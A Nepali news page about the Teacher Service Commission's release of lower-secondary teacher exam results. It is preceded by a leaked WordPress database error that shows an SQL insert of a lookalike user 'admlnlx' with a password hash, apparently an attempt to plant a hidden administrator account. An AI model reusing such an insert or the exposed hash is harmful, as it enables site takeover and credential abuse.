WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.2VznmW6MjTl0gK9Tmvz56.5ISitg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 09:28:29', '', 'admlnlx', 'admlnlx')
काठमाडौ,माघ २९-
शिक्षक सेवा आयोगले निम्न माध्यामिक तह तृतीय श्रेणीको स्थायी शिक्षक पदपूर्तिका लागि लिएको लिखित परीक्षा नतिजा सार्वजनिक गरेको छ। आयोगले देशका पाँच विकास क्षेत्रको गणित, पूर्वाञ्चल र पश्चिममाञ्चलको संस्कृत व्याकरण, पश्चिमाञ्चलको संस्कृत भाषा तथा पूर्वाञ्चल र मध्यमाञ्चलको कम्युटर विज्ञानको नतिजा सार्वजनिक गरेको हो ।
विभिन्न बिषयमा गत भदौ ११ मा लिएको लिखित परिक्षामा सफल हुनेहरुलाई अन्तर्वार्ताका लागि बोलाएको छ । लिखित परिक्षाको नतिजा चित्त नबुझेमा ७ दिनमा पुनर्योगका लागि आवेदनसमेत दिन पनि सम्बन्धित उम्मेद्वारहरुलाई आयोगले आग्रह
गरेको छ।